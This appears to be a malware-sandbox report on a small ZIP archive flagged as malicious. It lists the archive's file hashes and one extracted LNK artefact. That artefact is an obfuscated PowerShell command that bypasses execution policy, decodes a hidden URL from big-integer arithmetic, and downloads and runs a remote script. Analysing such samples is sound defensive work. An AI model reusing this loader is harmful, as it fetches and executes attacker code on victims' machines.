Malicious

debd3f013eacb8241b6a94d1e0d8fb1a

ZIP Archive
|
MD5: debd3f013eacb8241b6a94d1e0d8fb1a
|
Size: 2.56 KB
|
application/zip

Print

Infection Chain

Summary by MalvaGPT

Characteristics

Hash	Hash Value
MD5	debd3f013eacb8241b6a94d1e0d8fb1a
Sha1	0a88154a22734420c80cd76af1b0d77d003d807c
Sha256	f434146cddd6d79f9dbd8ef7733952ea97a7d324d7b173f0633ba385e909d30b
Sha384	91099315163e79cf2af3de989a8eeb487f3636d567410c680b581adc5c4baaca6ffdd7a973e01357c17070cd5547d904
Sha512	7e7631fce27dae1971cb819f24c022b8f4d7d62ff231d8cb26e8a96213cc75bb1ce5318f50b21a9b7fa3ac86c4f4951126716cddc9f19ff3130aac7bfa4f2d65
SSDeep	48:9nbzfKtJLY8tv3kmrBBG1MC0KP9R/jMH+05IIPRXkFu1x8vFHiuR/Slt:dbzinY8tNrS1jFpMHhkIuAuRK
TLSH	E25109577B12B876E727BE79C42407E91D3ED0C180B186FCA98B9B9C0CF9F974A60494

File Structure

Artefacts

Name0	Value
LNK: Command Execution	powershell.exe -ep bypass -c "$v=[bigint]\"15672546134675896723056169814999628033923469\";$r=[bigint]\"6139403790910975759451908051327495543859753\";$x=$v - $r;while($x -ne 0){$e+=[char]([int]($x -band 0xFF));$x=$x -shr 8};iwr $e -OutFile $env:TEMP\ZNmmIvD5.ps1 -UseBasicParsing; powershell -ep bypass -File $env:TEMP\ZNmmIvD5.ps1"

debd3f013eacb8241b6a94d1e0d8fb1a (2.56 KB)

An error has occurred. This application may no longer respond until reloaded. Reload 🗙